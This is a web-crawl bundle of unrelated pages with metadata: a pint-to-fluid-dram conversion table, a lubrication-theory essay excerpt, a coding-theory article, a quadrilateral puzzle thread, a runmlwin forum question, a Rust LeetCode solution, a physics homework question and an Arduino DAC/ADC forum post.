{"ft_lang_label":"__label__en","ft_lang_prob":0.8366494,"math_prob":0.9881654,"size":2271,"snap":"2019-43-2019-47","text_gpt3_token_len":496,"char_repetition_ratio":0.15438905,"word_repetition_ratio":0.017064847,"special_character_ratio":0.16776751,"punctuation_ratio":0.12885155,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99731874,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-15T20:08:48Z\",\"WARC-Record-ID\":\"<urn:uuid:7756622c-5718-46b4-ab11-690ebea2a740>\",\"Content-Length\":\"43703\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:72215bbe-5baf-42de-b4d7-34b0b616b78a>\",\"WARC-Concurrent-To\":\"<urn:uuid:bd9305bf-1ddd-452e-a404-f803fef8a99a>\",\"WARC-IP-Address\":\"104.27.170.19\",\"WARC-Target-URI\":\"https://www.ncatlab.org/nlab/show/properly+discontinuous+action\",\"WARC-Payload-Digest\":\"sha1:UWQANLFS7BYFHUILGA3EOXMODBTBHXC3\",\"WARC-Block-Digest\":\"sha1:S5PFOV57S7NAIA753ZDTNESMJGOK2KXQ\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496668712.57_warc_CC-MAIN-20191115195132-20191115223132-00293.warc.gz\"}"}
http://www.kylesconverter.com/volume/pints-(imperial)-to-fluid-drams-(us)
[ "# Convert Pints (imperial) to Fluid Drams (us)\n\n### Kyle's Converter > Volume > Pints (imperial) > Pints (imperial) to Fluid Drams (us)\n\n Pints (imperial) (pt (Imp)) Fluid Drams (us) (fl dr (US)) Precision: 0 1 2 3 4 5 6 7 8 9 12 15 18\nReverse conversion?\nFluid Drams (us) to Pints (imperial)\n(or just enter a value in the \"to\" field)\n\nPlease share if you found this tool useful:\n\nUnit Descriptions\n1 Pint (Imperial):\n1/8 gal (Imp)\n1 Fluid Dram (US):\n1/8 of a fluid ounce (US). 3.696 691 195 3125 milliliters.\n\nConversions Table\n1 Pints (imperial) to Fluid Drams (us) = 153.721670 Pints (imperial) to Fluid Drams (us) = 10760.5113\n2 Pints (imperial) to Fluid Drams (us) = 307.443280 Pints (imperial) to Fluid Drams (us) = 12297.7272\n3 Pints (imperial) to Fluid Drams (us) = 461.164890 Pints (imperial) to Fluid Drams (us) = 13834.9431\n4 Pints (imperial) to Fluid Drams (us) = 614.8864100 Pints (imperial) to Fluid Drams (us) = 15372.159\n5 Pints (imperial) to Fluid Drams (us) = 768.608200 Pints (imperial) to Fluid Drams (us) = 30744.3181\n6 Pints (imperial) to Fluid Drams (us) = 922.3295300 Pints (imperial) to Fluid Drams (us) = 46116.4771\n7 Pints (imperial) to Fluid Drams (us) = 1076.0511400 Pints (imperial) to Fluid Drams (us) = 61488.6362\n8 Pints (imperial) to Fluid Drams (us) = 1229.7727500 Pints (imperial) to Fluid Drams (us) = 76860.7952\n9 Pints (imperial) to Fluid Drams (us) = 1383.4943600 Pints (imperial) to Fluid Drams (us) = 92232.9543\n10 Pints (imperial) to Fluid Drams (us) = 1537.2159800 Pints (imperial) to Fluid Drams (us) = 122977.2724\n20 Pints (imperial) to Fluid Drams (us) = 3074.4318900 Pints (imperial) to Fluid Drams (us) = 138349.4314\n30 Pints (imperial) to Fluid Drams (us) = 4611.64771,000 Pints (imperial) to Fluid Drams (us) = 153721.5905\n40 Pints (imperial) to Fluid Drams (us) = 6148.863610,000 Pints (imperial) to Fluid Drams (us) = 1537215.9046\n50 Pints (imperial) to Fluid Drams (us) = 7686.0795100,000 Pints (imperial) to Fluid Drams (us) = 15372159.0465\n60 Pints (imperial) to Fluid Drams (us) = 9223.29541,000,000 Pints (imperial) to Fluid Drams (us) = 153721590.465" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5501042,"math_prob":0.9790377,"size":1644,"snap":"2019-13-2019-22","text_gpt3_token_len":668,"char_repetition_ratio":0.38414633,"word_repetition_ratio":0.33582088,"special_character_ratio":0.4975669,"punctuation_ratio":0.11217949,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9697961,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-03-21T14:08:04Z\",\"WARC-Record-ID\":\"<urn:uuid:203f70da-f83c-412f-b9d5-f7adda27742a>\",\"Content-Length\":\"18973\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:564fc881-e7fc-4abd-9521-86cdb7b8c5ef>\",\"WARC-Concurrent-To\":\"<urn:uuid:76d4a73d-77ef-4ef3-8157-5fbba5df20eb>\",\"WARC-IP-Address\":\"99.84.222.157\",\"WARC-Target-URI\":\"http://www.kylesconverter.com/volume/pints-(imperial)-to-fluid-drams-(us)\",\"WARC-Payload-Digest\":\"sha1:73TLQH5QGRDZ34IJZB2CCOGM4BKIUVD5\",\"WARC-Block-Digest\":\"sha1:AFJMANW33SU73R6LZFRPGPDBLD7EERGA\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-13/CC-MAIN-2019-13_segments_1552912202525.25_warc_CC-MAIN-20190321132523-20190321154523-00131.warc.gz\"}"}
https://www2.bartleby.com/essay/Analysis-Of-The-Navier-Stroke-Equation-FCX6ACLE6
[ "# Analysis Of The Navier-Stroke Equation\n\n824 Words4 Pages\nGeneral Equation The Navier-Strokes equation is the base of basic lubrication theory to solve the problem. The fluid characteristics such as density and viscosity are kept almost constant to solve the fluid flow problem. There are following problems which are solved by Navier-Stroke equation:- Laminar unidirectional flow between stationary parallel plates. Laminar unidirectional flow between parallel plates having relative motion. Laminar flow in circuit pipes. Laminar flow between concentric rotating cylinders. The Navier-Stroke equation can be written as following:- ρ (Du )/dt=ρX- (∂p )/∂x+ (∂ )/∂x {ɳ[ 2 (∂u )/∂x- (2 )/3 ((∂u )/∂x+(∂v )/∂y+(∂w )/∂z)]} + (∂ )/∂y [ɳ((∂u )/∂y+ (∂v )/∂x)]+ (∂ )/∂z [ɳ((∂u )/∂z+ (∂w )/∂x)]…show more content…\nA typical value h/L is about 10-3. After these assumptions the Navier-Stroke equation deduced into following equations:- u ∂u/∂x+ v ∂u/∂y=(-∂P)/∂x+μ((∂^2 u)/(∂x^2 )+(∂^2 u)/(∂y^2 ) ) ………..…………………….. (5) u ∂v/∂x+ v ∂v/∂y=(-∂P)/∂y+μ((∂^2 v)/(∂x^2 )+(∂^2 v)/(∂y^2 ) ) …………………..................… (6) And continuity equation is ∂u/∂x+ ∂v/∂y=0 …………...…………………………………………… (7) W =∫_0^L▒〖∫_0^B▒〖P dx dx〗 〗 ……………….…………………………………. (8) Ff = ∫_0^L▒∫_0^B▒〖τ dx dx〗 ……………………………………………… (9) μ= W/(F_f ) …………………………………………………..……. (10) The equations 8,9 and10 are used to calculate the load caring capacity, friction force and coefficient of friction. Geometries Used and Parametric study The current work has been taken to study the different shape of geometry (cylindrical and sectors with offset and change in orientation) effects in the sliding bearing performance. The hydrodynamic plain slider bearing is shown in the figure 3.1 which having a stationary plate and a moving plate separated by the lubricant oil. The direction of motion and the inclination are given such a way that the convergent film is…show more content…\nThe textured parameters include height ratio and area density ratio of dimple. The performance parameters of textured surface are compared relative to the plane sliding bearing. There are following ratios which are used to study the whole problem:- Load carrying capacity ratio = (load carrying capacity of dimpled baering (W_d))/(load carrying capacity of plane baering (W)) Coefficient of friction ratio = (Coefficient of frictional force of dimpled baering (μ_d))/(Coefficient of frictional force of plane baering (μ)) Volume flow rate ratio= (Volume flow rate of dimpled baering (Q_d))/(Volume flow rate of plane baering (Q)) Height ratio(ζ) = (dimple depth of the bearing ( h_d))/( minimum film thickness of baering ( h2)) Area density (α) = (Area of the dimple (A_d ))/( Area of baering ( A) ) × 100 Attitude (λ) = (Minimum Thickness (h1))/(Maximum Thckness" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8405766,"math_prob":0.98615813,"size":2718,"snap":"2023-40-2023-50","text_gpt3_token_len":846,"char_repetition_ratio":0.12969786,"word_repetition_ratio":0.0,"special_character_ratio":0.3031641,"punctuation_ratio":0.10208333,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99928266,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-24T23:46:26Z\",\"WARC-Record-ID\":\"<urn:uuid:2c49c796-c338-44a0-a0d6-3791844c0e25>\",\"Content-Length\":\"25235\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e2420a8e-32c8-4af2-99fa-9992356ceaec>\",\"WARC-Concurrent-To\":\"<urn:uuid:cc0ec4f6-b0e5-447c-b928-78b1d479dbfd>\",\"WARC-IP-Address\":\"108.138.85.30\",\"WARC-Target-URI\":\"https://www2.bartleby.com/essay/Analysis-Of-The-Navier-Stroke-Equation-FCX6ACLE6\",\"WARC-Payload-Digest\":\"sha1:MLG4FMKWY32XZPJLCSV6GWOXK76PLXEU\",\"WARC-Block-Digest\":\"sha1:NLICNPWHFQ62ZLNYTGX2RTAHS2OGRCII\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233506669.96_warc_CC-MAIN-20230924223409-20230925013409-00817.warc.gz\"}"}
https://i-programmer.info/babbages-bag/211-coding-theory.html
[ "Coding Theory\nThursday, 14 February 2019\nArticle Index\nCoding Theory\nMake It Equal\nHuffman And Zip\n\nInformation theory – perhaps one of the most remarkable inventions of the twentieth century - naturally leads on to the consideration of how information can be coded and hence coding theory.\n\n## A Programmers Guide To Theory - NP & Co-NP", null, "#### Contents\n\n*To be revised\n\nIn Information Theory we learned that if a message or symbol occurs with probability p then the information contained in that symbol or message is -log2(p) bits.\n\nFor example, consider the amount of information contained in a single letter from an alphabet. Assuming there are 26 letters in an alphabet and assuming they are all used equally often the probability of receiving any one particular letter is 1/26 which gives -log2(1/26)=4.7 bits per letter.\n\nIt is also obvious from other elementary considerations that five bits are more than enough to represent 26 symbols. Quite simply five bits allow you to count up to more than 26 and so you can assign one letter of the alphabet to each number. In fact, five bits is enough to  represent 32 symbols because you can count up to 31 i.e. 11111=31.\n\nUsing all five bits you can associate say A with 0 and Z with 25 and the values from 26 to 31  are just wasted. It seems a shame to have wasted bits just because we can’t quite find a way to use 4.7 bits – or can we.\n\nCan we split the bit?\n\n## Average information\n\nBefore we go on to consider “splitting the bit” we need to look more carefully at the calculation of the number of bits of information in one symbol from an alphabet of 26.\n\nClearly the general case is that a symbol from an alphabet of n symbols has information equal to –log2(n) bits assuming that every symbol has equal probability.\n\nOf course what is wrong with this analysis is that the letters of the alphabet are not all equally likely to occur. For example, if you don’t receive a letter “e” you would be surprised – count the number in this sentence. However your surprise at seeing the letter “z” should be higher – again count the number in some other sentence than this one!\n\nEmpirical studies can provide us with the actual rates that letters occur – just count them in a book for example. If you add the “Space” character to the set of symbols you will discover that it is by far the most probable character with a probability of 0.185 of occurring, followed by “e” at 0.100, “t” at 0.080 and so on.. down to “z” which has a probability of only 0.0005. It makes you wonder why we bother with “z” at all!\n\nBut, given that “z” is so unlikely its information content is very high –log2(0.0005)=10.96 bits. In other words “z” contains nearly 11 bits of information compared to just over 3 bits for “e”.\n\nIf you find this argument difficult to follow just imagine that you are placing bets on the next symbol to appear. You expect the next symbol to be a Space character so you are very surprised when it turns out to be a z. Your betting instincts tell you what the expected behaviour of the world is and when something happens that isn't expected you gains some information.\n\nTaken to the extreme it seems almost obvious. The sun rises every morning and so the news that it has risen this morning is really no news - no information. Now consider the opposite event, that is some information!\n\nWe can define an average information that we expect to get from a single character taken from the alphabet.\n\nIf the ith symbol occurs with probability pi then the information it contains is –log2(pi) bits and the average information contained in one symbol, averaged over all symbols is:\n\n`Average information= –p1log2(p1) – p2log2(p2) –p3log2(p3) … –pnlog2(pn)`\n\nYou can see that this is reasonable because each symbol occurs with probability pi and each time it occurs it provides –log2(pi) bits of information. Notice that while “z” carries 11 bits of information the fact that it doesn’t occur very often means that its contribution to the average information is only about 0.0005 x 11 or 0.0055 bits per symbol.\n\nApplying this formula to the letters of the alphabet and their probabilities gives an average information of 4.08 bits per symbol which should be compared to 4.76 bits per symbol for an alphabet of 27 equally likely characters. Notice that the average information in 27 equally likely characters is also 4.76 bits – to see why try working it out.\n\nThere is also a nice theorem which says that the average information per symbol is largest if all of the symbols are equally likely. This means that if any of the symbols of an alphabet are used more or less often than others the average information per symbol is lower and this observation is the key to data compression techniques.\n\n<ASIN:0521852293>\n\n<ASIN:0252725484>\n\n<ASIN:0198538030>\n\nLast Updated ( Thursday, 14 February 2019 )" ]
[ null, "https://i-programmer.info/images/stories/Core/Theory/theorycover.JPG", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.91968334,"math_prob":0.96150875,"size":5285,"snap":"2020-34-2020-40","text_gpt3_token_len":1215,"char_repetition_ratio":0.15072903,"word_repetition_ratio":0.012889367,"special_character_ratio":0.2359508,"punctuation_ratio":0.065737054,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97002286,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-22T10:31:48Z\",\"WARC-Record-ID\":\"<urn:uuid:81ce1ad9-ec32-4481-8340-db94f26b2f40>\",\"Content-Length\":\"38778\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4f33d286-96c0-4d4c-b319-d79d0ff02a06>\",\"WARC-Concurrent-To\":\"<urn:uuid:7a654388-fa78-4793-8032-b6bd89422331>\",\"WARC-IP-Address\":\"18.209.126.167\",\"WARC-Target-URI\":\"https://i-programmer.info/babbages-bag/211-coding-theory.html\",\"WARC-Payload-Digest\":\"sha1:OEXSJ2L7SO3YGBMMEXKNFRDW4SCIRGFE\",\"WARC-Block-Digest\":\"sha1:RNQWK7GD6GSDQSHWHXIFRXYREUBKYOYT\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600400205950.35_warc_CC-MAIN-20200922094539-20200922124539-00080.warc.gz\"}"}
https://puzzling.stackexchange.com/questions/22446/professor-halfbrains-quadrilateral-theorem
[ "Professor Halfbrain has recently made a fascinating discovery on quadrilaterals in the plane.\n\nHalfbrain's quadrilateral theorem: Let $ABCD$ be a plane quadrilateral that possesses an incircle and a circumcircle. If the center of the incircle coincides with the center of the circumcircle, then $ABCD$ is a square.\n\nQuestion: Is this theorem indeed true, or has the professor once again made one of his mathematical blunders?\n\nIt is\n\ntrue\n\nProof:\n\nLet's first draw the concentric incircle and circumcircle. We draw the quadrilateral starting with a vertex on the outer circle and proceeding clockwise. The edge leaving that vertex must be tangent to the inner circle and so is forced.\nThe next vertex is where this line intersects the outer circle. Now, we're in the same situation as before, but rotated. So, the resulting shape must be rotationally-symmetric (edge-transitive).\nIf it returns to the initial vertex without crossing itself, it must be a regular polygon. If it has four edges, it's a square.\n\nThe theorem is...\n\n... not true. There are an infinite number of concave quadrangles which also bicentric with a incentre-circumcentre distance of zero, each one associated with a specific out-radius:in-radius ratio $R/r$, where $R/r < \\sqrt{2}$. According to Fuss' Theorem, only in the special case where $R/r = \\sqrt{2}$ does a square solution appear.\n\nProof:\n\nTo construct a concave solution, within a given circle, draw two arbitrary chords $AB$ and $AD$ from $A$, such that $\\angle BAD < 60^{\\circ}$. Then, draw the incircle such that the chords $AB$ and $AD$ are both tangent to the incircle. Finally, choose a point $C$ on the incircle to complete the quadrangle $ABCD$.\n\n• Does a concave quadrilateral have a circumcircle? I understand that to mean that all four points lie on that circle, i.e. it is a cyclic quadrilateral.\n– xnor\nSep 21, 2015 at 9:37\n• By the way, your construction didn't work for me. Also, Fuss theorem applies to any bicentric quad. If you plus $d=0$ in it, You get $R/r= \\sqrt{2}$ which only holds for a square. Sep 21, 2015 at 9:53\n• Yes, Fuss' Theorem only applies to simple convex quadrilaterals. For the concave case, as xnor has noitced, I took the liberty to generalize the incircle and circumcircle to the maximum inscriptable circle and the minimum bounded circle, respectively (otherwise both are hilariously undefined for the concave polygon). Sep 21, 2015 at 10:00" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9007356,"math_prob":0.99130595,"size":1640,"snap":"2023-40-2023-50","text_gpt3_token_len":384,"char_repetition_ratio":0.119804405,"word_repetition_ratio":0.0,"special_character_ratio":0.22012195,"punctuation_ratio":0.12861736,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99959177,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-03T20:08:46Z\",\"WARC-Record-ID\":\"<urn:uuid:0087acca-1c57-45a4-a526-3525ae45858e>\",\"Content-Length\":\"170153\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:534476ca-b968-452c-a543-5d1b2e427201>\",\"WARC-Concurrent-To\":\"<urn:uuid:c170ea2b-603e-4a4b-a4ef-680ee8e89182>\",\"WARC-IP-Address\":\"104.18.11.86\",\"WARC-Target-URI\":\"https://puzzling.stackexchange.com/questions/22446/professor-halfbrains-quadrilateral-theorem\",\"WARC-Payload-Digest\":\"sha1:XIMFPRPV3IYGZQTQBKUQAOSRXBEQIXGO\",\"WARC-Block-Digest\":\"sha1:IYMAI5K6NRQZZSPB6EB75N4OSMHKOCPW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233511220.71_warc_CC-MAIN-20231003192425-20231003222425-00824.warc.gz\"}"}
https://www.cmm.bristol.ac.uk/forum/viewtopic.php?f=3&p=7438&sid=cb966e98d17e1b0e081d8b6462d96f98
[ "## Combining mcmc(cc) logit results using mi estimate\n\nWelcome to the forum for runmlwin users. Feel free to post your question about runmlwin here. The Centre for Multilevel Modelling take no responsibility for the accuracy of these posts, we are unable to monitor them closely. Do go ahead and post your question and thank you in advance if you find the time to post any answers!\n\nGo to runmlwin: Running MLwiN from within Stata >> http://www.bristol.ac.uk/cmm/software/runmlwin/\nmlwinmlwin\nPosts: 1\nJoined: Fri Apr 23, 2021 8:16 pm\n\n### Combining mcmc(cc) logit results using mi estimate\n\nThank you in advance! I am relatively new to runmlwin and Bayesian models.\n\nI am running a longitudinal cross-classified logit model (10 rounds of individual observations, and individuals can move across states over the 10 years). Due to missingness, I used \"mi impute chained\" to impute missing data. Based on my reading of previous posts, I know I should be able to use \"mi estimate, cmdok\" to combine the results across imputed datasets. Here are my codes:\n\nSTEP 1:\ngen cons=1\n\nmi estimate, cmdok noisily post imputations (1/5): ///\nrunmlwin DV cons IV1 IV2 IV3, ///\nlevel3 (state_fips: cons) ///\nlevel2 (study_id: cons) ///\nlevel1 (year:) ///\ndiscrete(dist(binomial) link(logit) denom(cons)) nopause forcesort\n\nestimates store m_prior\n\nSTEP 2:\nmi estimate, cmdok noisily imputations (1/5): ///\nrunmlwin DV cons IV1 IV2 IV3, ///\nlevel3 (state_fips: cons) ///\nlevel2 (study_id: cons) ///\nlevel1 (year:) ///\ndiscrete(dist(binomial) link(logit) denom(cons)) mcmc(cc) initsmodel(m_prior) nopause forcesort\n\n1) Do my codes look correct? (I have been running them successfully for my analysis, but want to double-check with experts here)\n\n2) More specifically, in both step 1 and step 2, when showing the combined results, I observed \"Average RVI = .\", \"Largest FMI=. \", \"DF: avg =.\", and \"DF: max =.\". Are these normal to see?\n\n3) Most importantly, in step 2 with MCMC(CC), how can we interpret \"Coef. Std. Err. t P>|t| [95% Conf. Interval]\" in the combined results? In each iteration (i.e., m=1, 2, etc.), we get \"Mean Std. Dev. ESS P [95% Cred. Interval]\". Can we interpret [95% Conf. Interval] in the combined results the same as [95% Cred. Int] derived in each iteration (i.e., m=1, 2, etc.)? How about the p-values in the combined results? Are these p-values in the combined results one-sided or two-sided? Any other things I should be aware of when interpreting the combined results?\n\nThank you again!\nChrisCharlton\nPosts: 1252\nJoined: Mon Oct 19, 2009 10:34 am\n\n### Re: Combining mcmc(cc) logit results using mi estimate\n\nI asked George about this and he had the following suggestions, although we are not that familiar with the mi estimate command:\n1. You can probably skip step 1 and just supply some plausible starting values to step 2, rather than having to do two sets of imputations. Otherwise the runmlwin syntax looks fine.\n2. We aren't really sure what these statistics refer to, and suggest looking at the documentation for https://www.stata.com/help.cgi?mi_estimate to see if that gives some guidance.\n3. It is probable that the command is combining the results from the five sets of models using Rubin's rules on the means of the chains returned in e(b) and e(V). This would suggest that what is returned would be regular 2-sided p-values." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.87804407,"math_prob":0.6644344,"size":2829,"snap":"2021-21-2021-25","text_gpt3_token_len":762,"char_repetition_ratio":0.110442474,"word_repetition_ratio":0.10367171,"special_character_ratio":0.27712974,"punctuation_ratio":0.16319445,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95633703,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-23T15:51:21Z\",\"WARC-Record-ID\":\"<urn:uuid:e5e0a47b-c48e-4fc1-8608-1a2c31bd5026>\",\"Content-Length\":\"26714\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:71ed355f-9240-4098-b9d0-b71d6b00ab21>\",\"WARC-Concurrent-To\":\"<urn:uuid:60caa61f-f191-4692-94b9-3d15a9586e28>\",\"WARC-IP-Address\":\"137.222.0.123\",\"WARC-Target-URI\":\"https://www.cmm.bristol.ac.uk/forum/viewtopic.php?f=3&p=7438&sid=cb966e98d17e1b0e081d8b6462d96f98\",\"WARC-Payload-Digest\":\"sha1:KCUNHLI7CX3MZJZNBH6Z3UVH4DVUVST2\",\"WARC-Block-Digest\":\"sha1:FH5WVGOHXAGHOTRCXN6GI5DYYY3QO4MB\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623488539480.67_warc_CC-MAIN-20210623134306-20210623164306-00603.warc.gz\"}"}
https://rustgym.com/leetcode/807
[ "## 807. Max Increase to Keep City Skyline\n\nIn a 2 dimensional array `grid`, each value `grid[i][j]` represents the height of a building located there. We are allowed to increase the height of any number of buildings, by any amount (the amounts can be different for different buildings). Height 0 is considered to be a building as well.\n\nAt the end, the \"skyline\" when viewed from all four directions of the grid, i.e. top, bottom, left, and right, must be the same as the skyline of the original grid. A city's skyline is the outer contour of the rectangles formed by all the buildings when viewed from a distance. See the following example.\n\nWhat is the maximum total sum that the height of the buildings can be increased?\n\n```Example:\nInput: grid = [[3,0,8,4],[2,4,5,7],[9,2,6,3],[0,3,1,0]]\nOutput: 35\nExplanation:\nThe grid is:\n[ [3, 0, 8, 4],\n[2, 4, 5, 7],\n[9, 2, 6, 3],\n[0, 3, 1, 0] ]\n\nThe skyline viewed from top or bottom is: [9, 4, 8, 7]\nThe skyline viewed from left or right is: [8, 7, 9, 3]\n\nThe grid after increasing the height of buildings without affecting skylines is:\n\ngridNew = [ [8, 4, 8, 7],\n[7, 4, 7, 7],\n[9, 4, 8, 7],\n[3, 3, 3, 3] ]\n\n```\n\nNotes:\n\n• `1 < grid.length = grid.length <= 50`.\n• All heights `grid[i][j]` are in the range `[0, 100]`.\n• All buildings in `grid[i][j]` occupy the entire grid cell: that is, they are a `1 x 1 x grid[i][j]` rectangular prism.\n\n## Rust Solution\n\n``````struct Solution;\n\nimpl Solution {\nfn max_increase_keeping_skyline(grid: Vec<Vec<i32>>) -> i32 {\nlet n = grid.len();\nlet m = grid.len();\nlet mut row: Vec<i32> = vec![0; n];\nlet mut col: Vec<i32> = vec![0; m];\nlet mut res = 0;\nfor i in 0..n {\nfor j in 0..m {\nrow[i] = row[i].max(grid[i][j]);\ncol[j] = col[j].max(grid[i][j]);\n}\n}\nfor i in 0..n {\nfor j in 0..m {\nres += row[i].min(col[j]) - grid[i][j];\n}\n}\nres\n}\n}\n\n#[test]\nfn test() {\nlet grid = vec_vec_i32![[3, 0, 8, 4], [2, 4, 5, 7], [9, 2, 6, 3], [0, 3, 1, 0]];\nlet res = 35;\nassert_eq!(Solution::max_increase_keeping_skyline(grid), res);\n}\n``````\n\nHaving problems with this solution? Click here to submit an issue on github." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.83751017,"math_prob":0.9944588,"size":2034,"snap":"2021-21-2021-25","text_gpt3_token_len":703,"char_repetition_ratio":0.1275862,"word_repetition_ratio":0.08672087,"special_character_ratio":0.3903638,"punctuation_ratio":0.26022306,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.974389,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-16T21:25:39Z\",\"WARC-Record-ID\":\"<urn:uuid:4e6d5bd2-cebb-4a33-b6ee-cb374ada5eb9>\",\"Content-Length\":\"8389\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cb64c1f4-4ae1-4a57-9d7d-d3227762be50>\",\"WARC-Concurrent-To\":\"<urn:uuid:2431153c-8697-42e6-95b7-163eb6e5f99d>\",\"WARC-IP-Address\":\"35.188.52.69\",\"WARC-Target-URI\":\"https://rustgym.com/leetcode/807\",\"WARC-Payload-Digest\":\"sha1:EAD7HFTSQUJV6M3TZFICZHTXBNNLGXTG\",\"WARC-Block-Digest\":\"sha1:3SCISJRLJT3L6DYDV7I5UQ53XUJKUD4Q\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243989914.60_warc_CC-MAIN-20210516201947-20210516231947-00602.warc.gz\"}"}
https://homework.zookal.com/questions-and-answers/a-194-109-c-charge-has-coordinates-x--0-783345693
[ "1. Science\n2. Physics\n3. a 194 109 c charge has coordinates x 0...\n\n# Question: a 194 109 c charge has coordinates x 0...\n\n###### Question details\n\nA 1.94 10-9 C charge has coordinates x = 0, y = −2.00; a 2.88 10-9 C charge has coordinates x = 3.00, y = 0; and a -5.40 10-9 C charge has coordinates x = 3.00, y = 4.00, where all distances are in cm. Determine magnitude and direction for the electric field at the origin and the instantaneous acceleration of a proton placed at the origin.\n\n(a) Determine the magnitude and direction for the electric field at the origin (measure the angle counterclockwise from the positive x-axis).\n\n(b) Determine the magnitude and direction for the instantaneous acceleration of a proton placed at the origin (measure the angle counterclockwise from the positive x-axis).\n\n###### Solution by an expert tutor", null, "" ]
[ null, "https://homework.zookal.com/images/blurredbg-mobile.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.83349144,"math_prob":0.99363697,"size":725,"snap":"2021-21-2021-25","text_gpt3_token_len":186,"char_repetition_ratio":0.12343967,"word_repetition_ratio":0.45901638,"special_character_ratio":0.28413793,"punctuation_ratio":0.13725491,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98896897,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-18T05:12:51Z\",\"WARC-Record-ID\":\"<urn:uuid:b80fb246-1e1f-4336-aa0d-1a3992a9602f>\",\"Content-Length\":\"120141\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c7f331f9-0705-469f-a2c9-137a6b07341b>\",\"WARC-Concurrent-To\":\"<urn:uuid:015a19f8-e76a-4e8b-b011-3d08d4a2b0ab>\",\"WARC-IP-Address\":\"13.236.213.71\",\"WARC-Target-URI\":\"https://homework.zookal.com/questions-and-answers/a-194-109-c-charge-has-coordinates-x--0-783345693\",\"WARC-Payload-Digest\":\"sha1:GFA5F35IQIXWAAF73JQ5AQLHBRMTVWDP\",\"WARC-Block-Digest\":\"sha1:PUZTKKCQXRINKRK64X7QZLMEQAPT2HFW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243989820.78_warc_CC-MAIN-20210518033148-20210518063148-00235.warc.gz\"}"}
https://forum.arduino.cc/index.php?topic=607595.0
[ "Go Down\n\n### Topic: Same code different behaviour (Read 260 times)previous topic - next topic\n\n#### Tyarel", null, "##### Apr 02, 2019, 06:15 pm\nHi everyone,\n\nI am currently working on Arduino DUE in order to generate a wave and acquire sinals from ADC (both with DMA and/or Interrupt) , first I used DAC pin but it was not suited for my work, so I changed and I am now using a \"common\" pin where a PWM wave with periodcally different duty cycle is generated.\n\nBoth methods work and do what they have to do, but ADC code, although it is the same, works only in the DAC case. In PWM case ADC_handler is never called (everything I write in ADC_handler is never computed) and the code is not stuck in a point (the loop works).\n\nIt seems like either ADC is not enabled or timer that command ADC interrupt has a problem. Actually, in the DAC case, ADC works only if DAC is working too: if DAC Init functions are commented, ADC doesn't work too.\n\nI really can not cope with this absurdity, if someone has an idea, I would be very grateful!\n\nThank you!\nLuigi\n\n#### Tyarel", null, "#1\n##### Apr 02, 2019, 08:13 pm\nDAC case code (buf[] is the lookup table)\nCode: 